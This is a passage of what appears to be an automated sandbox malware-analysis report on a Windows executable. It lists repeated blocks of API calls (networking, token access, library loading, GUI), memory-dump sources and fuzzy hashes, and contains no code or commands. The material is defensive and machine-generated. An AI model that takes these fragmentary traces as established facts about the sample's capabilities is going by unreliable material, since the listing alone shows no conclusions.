                                                                              • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0043D4B9
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                              • String ID:
                                                                              • API String ID: 1378193009-0
                                                                              • Opcode ID: 8233c1c53fe49e8a502b553c2e8f55af8437e20015ea4a24a99bc4102d4ad802
                                                                              • Instruction ID: dcb2c65cf3c1a774e1d203f737fabc32089307ed9affa8f53aec521d9447171b
                                                                              • Opcode Fuzzy Hash: 8233c1c53fe49e8a502b553c2e8f55af8437e20015ea4a24a99bc4102d4ad802
                                                                              • Instruction Fuzzy Hash: 6F21FBB0904754AFE7328B249C45BEBBBEC9B55318F0404AFE79A56281C3782984CB49
                                                                              APIs
                                                                                • Part of subcall function 00405A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00467896,?,?,00000000), ref: 00405A2C
                                                                                • Part of subcall function 00405A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00467896,?,?,00000000,?,?), ref: 00405A50
                                                                              • gethostbyname.WSOCK32(?,?,?), ref: 00476399
                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 004763A4
                                                                              • _memmove.LIBCMT ref: 004763D1
                                                                              • inet_ntoa.WSOCK32(?), ref: 004763DC
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                                              • String ID:
                                                                              • API String ID: 1504782959-0
                                                                              • Opcode ID: 762733e25637bc439446b3da9c5912462bd92284ca480afd830ba0cdb0608b85
                                                                              • Instruction ID: c304d0e6e06ed5b692ae79d4b0fe9c52f6c8e6d6f1456e813eafe14ad56adccd
                                                                              • Opcode Fuzzy Hash: 762733e25637bc439446b3da9c5912462bd92284ca480afd830ba0cdb0608b85
                                                                              • Instruction Fuzzy Hash: F2114F71600109AFCB00FBA5D946CEE77B9EF04314B54847AF505B72A2DB389E14CB69
                                                                              APIs
                                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 00458B61
                                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00458B73
                                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00458B89
                                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00458BA4
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend
                                                                              • String ID:
                                                                              • API String ID: 3850602802-0
                                                                              • Opcode ID: ca17c677d33199d8ade5de32726d6ec6320cad89c97852bedaa9fe676a546a7f
                                                                              • Instruction ID: 6d6e4feeaee75d02a1ec4dd614e497ad2765f264ac6e3ed00c825e9843e5ba14
                                                                              • Opcode Fuzzy Hash: ca17c677d33199d8ade5de32726d6ec6320cad89c97852bedaa9fe676a546a7f
                                                                              • Instruction Fuzzy Hash: 56113A79900218BFDB10DB95C884EAEBB78EB48710F2041A6E900B7250DA716E15DB94
                                                                              APIs
                                                                                • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                                              • DefDlgProcW.USER32(?,00000020,?), ref: 004012D8
                                                                              • GetClientRect.USER32(?,?), ref: 0043B5FB
                                                                              • GetCursorPos.USER32(?), ref: 0043B605
                                                                              • ScreenToClient.USER32(?,?), ref: 0043B610
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Client$CursorLongProcRectScreenWindow
                                                                              • String ID:
                                                                              • API String ID: 4127811313-0
                                                                              • Opcode ID: 1c8f769d0dee53fb8c778101d630ad27ed939e462680dcfd79beede70ddeeb32
                                                                              • Instruction ID: ee9d34d9398b5f91fab5137b757b2ab9dbcc007e8162b1c14587a54292e2d527
                                                                              • Opcode Fuzzy Hash: 1c8f769d0dee53fb8c778101d630ad27ed939e462680dcfd79beede70ddeeb32
                                                                              • Instruction Fuzzy Hash: 39112B39510059FBCB00EF99D8899AE77B8FB05300F4008AAF901F7291D734BA569BA9
                                                                              APIs
                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,02F515D8,00000000,00000000,?,02F52132,02F515D8,00000000,00000000,00000000,?,02F52283,00000006,FlsSetValue), ref: 02F521BD
                                                                              • GetLastError.KERNEL32(?,02F52132,02F515D8,00000000,00000000,00000000,?,02F52283,00000006,FlsSetValue,02F66FC4,FlsSetValue,00000000,00000364,?,02F5192D), ref: 02F521C9
                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,02F52132,02F515D8,00000000,00000000,00000000,?,02F52283,00000006,FlsSetValue,02F66FC4,FlsSetValue,00000000), ref: 02F521D7
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1454997766.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2f10000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: LibraryLoad$ErrorLast
                                                                              • String ID:
                                                                              • API String ID: 3177248105-0
                                                                              • Opcode ID: e4c521c71e5d644cf17c00b6f25ebcc5d24b1cc6331ab7fc8d35495d3487354c
                                                                              • Instruction ID: ef06cbb15d44f4cb14029c36e96692aa772080cbafccdc7b812ef83f0d94b4a1
                                                                              • Opcode Fuzzy Hash: e4c521c71e5d644cf17c00b6f25ebcc5d24b1cc6331ab7fc8d35495d3487354c
                                                                              • Instruction Fuzzy Hash: CE01A776F41236ABE7214A79EC44E57BB98AF45BE17110B20FF15D7140D720D921CAF0
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                              • String ID:
                                                                              • API String ID: 3016257755-0
                                                                              • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                              • Instruction ID: 3d94be51af7e819a6a5def82be0e086b27bd99855e7e965629bee2c507946819
                                                                              • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                              • Instruction Fuzzy Hash: 78014EB244414ABBCF2A5E84CC41CEE3F72BB1C354F599416FA9858131D23AD9B1AB85
                                                                              APIs
                                                                              • GetWindowRect.USER32(?,?), ref: 0048B2E4
                                                                              • ScreenToClient.USER32(?,?), ref: 0048B2FC
                                                                              • ScreenToClient.USER32(?,?), ref: 0048B320
                                                                              • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0048B33B
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: ClientRectScreen$InvalidateWindow
                                                                              • String ID:
                                                                              • API String ID: 357397906-0
                                                                              • Opcode ID: e8173e98fc73e507b6a04d2f7e54522757b65c9b70d93ac78b94b59699abf8f9
                                                                              • Instruction ID: e0f35f64d62337ec24ef524e52db7040af9c6cc02db1932b8591958b9ea84988
                                                                              • Opcode Fuzzy Hash: e8173e98fc73e507b6a04d2f7e54522757b65c9b70d93ac78b94b59699abf8f9
                                                                              • Instruction Fuzzy Hash: B9117775D00209EFDB01DF99C444AEEBBF5FF18310F104566E914E3220D735AA558F94
                                                                              APIs
                                                                              • EnterCriticalSection.KERNEL32(?), ref: 00466BE6
                                                                                • Part of subcall function 004676C4: _memset.LIBCMT ref: 004676F9
                                                                              • _memmove.LIBCMT ref: 00466C09
                                                                              • _memset.LIBCMT ref: 00466C16
                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 00466C26
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalSection_memset$EnterLeave_memmove
                                                                              • String ID:
                                                                              • API String ID: 48991266-0
                                                                              • Opcode ID: edf19e1ede3b3e611382947217f22c9f8674c26c836af00265cbaa5f5bcd5e3d
                                                                              • Instruction ID: 06c116e41b1fbc97defe022da98efa456519ca017efd3746de7cd937a477406a
                                                                              • Opcode Fuzzy Hash: edf19e1ede3b3e611382947217f22c9f8674c26c836af00265cbaa5f5bcd5e3d
                                                                              • Instruction Fuzzy Hash: ACF0547A200110BBCF016F56EC85A8ABF29EF45325F4480A9FE085E227D775E811CBB9
                                                                              APIs
                                                                              • GetSysColor.USER32(00000008), ref: 00402231
                                                                              • SetTextColor.GDI32(?,000000FF), ref: 0040223B
                                                                              • SetBkMode.GDI32(?,00000001), ref: 00402250
                                                                              • GetStockObject.GDI32(00000005), ref: 00402258
                                                                              • GetWindowDC.USER32(?,00000000), ref: 0043BE83
                                                                              • GetPixel.GDI32(00000000,00000000,00000000), ref: 0043BE90
                                                                              • GetPixel.GDI32(00000000,?,00000000), ref: 0043BEA9
                                                                              • GetPixel.GDI32(00000000,00000000,?), ref: 0043BEC2
                                                                              • GetPixel.GDI32(00000000,?,?), ref: 0043BEE2
                                                                              • ReleaseDC.USER32(?,00000000), ref: 0043BEED
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                              • String ID:
                                                                              • API String ID: 1946975507-0
                                                                              • Opcode ID: 1c24b0d26c008fe2912d49eeb423ba9ae618f885d5077ddc5dea034ec8dbd8ce
                                                                              • Instruction ID: 54194c7dea5641a5760446fc0b471bd43188e270dcc7ade6c1867ff591c8ccba
                                                                              • Opcode Fuzzy Hash: 1c24b0d26c008fe2912d49eeb423ba9ae618f885d5077ddc5dea034ec8dbd8ce
                                                                              • Instruction Fuzzy Hash: 8FE03932104244EADB215FA8EC4D7D93B10EB05332F10837AFB69980E187B54994DB16
                                                                              APIs
                                                                              • GetCurrentThread.KERNEL32 ref: 0045871B
                                                                              • OpenThreadToken.ADVAPI32(00000000,?,?,?,004582E6), ref: 00458722
                                                                              • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,004582E6), ref: 0045872F
                                                                              • OpenProcessToken.ADVAPI32(00000000,?,?,?,004582E6), ref: 00458736
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: CurrentOpenProcessThreadToken
                                                                              • String ID:
                                                                              • API String ID: 3974789173-0
                                                                              • Opcode ID: c13fcb7cbc4fcf9024c8800305f1294cb96d5ee06e78be5c1b908a636c14961a
                                                                              • Instruction ID: 27e516f12521b82670cd12e73380cd235ac9fe5f10b87aab6d4880cb8d6f589a
                                                                              • Opcode Fuzzy Hash: c13fcb7cbc4fcf9024c8800305f1294cb96d5ee06e78be5c1b908a636c14961a
                                                                              • Instruction Fuzzy Hash: 69E086366113119FD7205FB45D0CB5B3BACEF55792F244C3CB645D9051DA388449C754
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: %I
                                                                              • API String ID: 0-63094095
                                                                              • Opcode ID: bceaa088faf8b79c40e3b3fb6df2ffba80340295d052be8b077f682f6d29ec08
                                                                              • Instruction ID: fc9b66e0bafda5900f64632d1c19c64e360ede111f7e08ffc6918f9b7723571d
                                                                              • Opcode Fuzzy Hash: bceaa088faf8b79c40e3b3fb6df2ffba80340295d052be8b077f682f6d29ec08
                                                                              • Instruction Fuzzy Hash: F7B19D759001099ACF24EF95C8819EEB7B5EF44314F11403BE942B72D1DB3C9AA6CB9E
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: __itow_s
                                                                              • String ID: xbL$xbL
                                                                              • API String ID: 3653519197-3351732020
                                                                              • Opcode ID: 90ba7ef9f8d9146918a72878262fd05d6879b866cf0277a0a7876aadaa269471
                                                                              • Instruction ID: dfe480003ad9fd5cab9b7df9ebde8448aad3da8901d64dd9d19fd2ed475b7079
                                                                              • Opcode Fuzzy Hash: 90ba7ef9f8d9146918a72878262fd05d6879b866cf0277a0a7876aadaa269471
                                                                              • Instruction Fuzzy Hash: DFB16E70A00105EFCB14DF55C890EEAB7B9EF58344F14C46AF949AB291EB38E941CB99
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1454997766.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2f10000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: pow
                                                                              • API String ID: 0-2276729525
                                                                              • Opcode ID: a805a147513e6a9f65bc8f26a1689b258f9f61c2c1b0a9b6ecee4a5f729cae06
                                                                              • Instruction ID: 308e45947604bdf9c8477df7001870c79961199963d45950466bfba2fcf14a5e
                                                                              • Opcode Fuzzy Hash: a805a147513e6a9f65bc8f26a1689b258f9f61c2c1b0a9b6ecee4a5f729cae06
                                                                              • Instruction Fuzzy Hash: C3517A61E0810696DB117B14CD4037B7FA4DF40BC4F208E68EFDE86A98EFB595D5CA42
                                                                              APIs
                                                                                • Part of subcall function 0041FC86: _wcscpy.LIBCMT ref: 0041FCA9
                                                                                • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                                                                • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                                                              • __wcsnicmp.LIBCMT ref: 0046B02D
                                                                              • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0046B0F6
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                              • String ID: LPT
                                                                              • API String ID: 3222508074-1350329615
                                                                              • Opcode ID: d30bb05f983bd9a15c5a3ce658688309f82e14a56a6b12c00daa3c40a9bd9b45
                                                                              • Instruction ID: 83c5630e61c03cc96fa61f6b78faa4233f6e1162f12f5b466cba6b991e1c6364
                                                                              • Opcode Fuzzy Hash: d30bb05f983bd9a15c5a3ce658688309f82e14a56a6b12c00daa3c40a9bd9b45
                                                                              • Instruction Fuzzy Hash: EF617475A00215AFCB14DF54C851EEEB7B4EF09350F10806AF916EB391E738AE85CB99
                                                                              APIs
                                                                              • Sleep.KERNEL32(00000000), ref: 00412968
                                                                              • GlobalMemoryStatusEx.KERNEL32(?), ref: 00412981
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: GlobalMemorySleepStatus
                                                                              • String ID: @
                                                                              • API String ID: 2783356886-2766056989
                                                                              • Opcode ID: cf15a7ea090bffc9490279112080cc94ce2022ef9ba38fcf57aa55417a2360bc
                                                                              • Instruction ID: a5a81f9d260a569e77baff687d6fe7a0f73e349ca0d117409dcb6840122a66be
                                                                              • Opcode Fuzzy Hash: cf15a7ea090bffc9490279112080cc94ce2022ef9ba38fcf57aa55417a2360bc
                                                                              • Instruction Fuzzy Hash: CB5159B24187449BD320EF15D885BAFBBE8FB85344F41886DF2D8911A1DB74892CCB5A
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: ClearVariant
                                                                              • String ID: DdL$DdL
                                                                              • API String ID: 1473721057-91670653
                                                                              • Opcode ID: 642cbb757c798b464e218aa70decae5e6efc434086f495e8bbeb8dcdbabf2780
                                                                              • Instruction ID: 8cf85b897da21b35b232154f37a53a393289a03a8f02d27ab87a98346ee69310
                                                                              • Opcode Fuzzy Hash: 642cbb757c798b464e218aa70decae5e6efc434086f495e8bbeb8dcdbabf2780
                                                                              • Instruction Fuzzy Hash: 5D5113B86043019FD754DF18C580A1ABBF1BF99344F54886EE9859B3A1D339EC91CF4A
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 0047259E
                                                                              • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 004725D4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
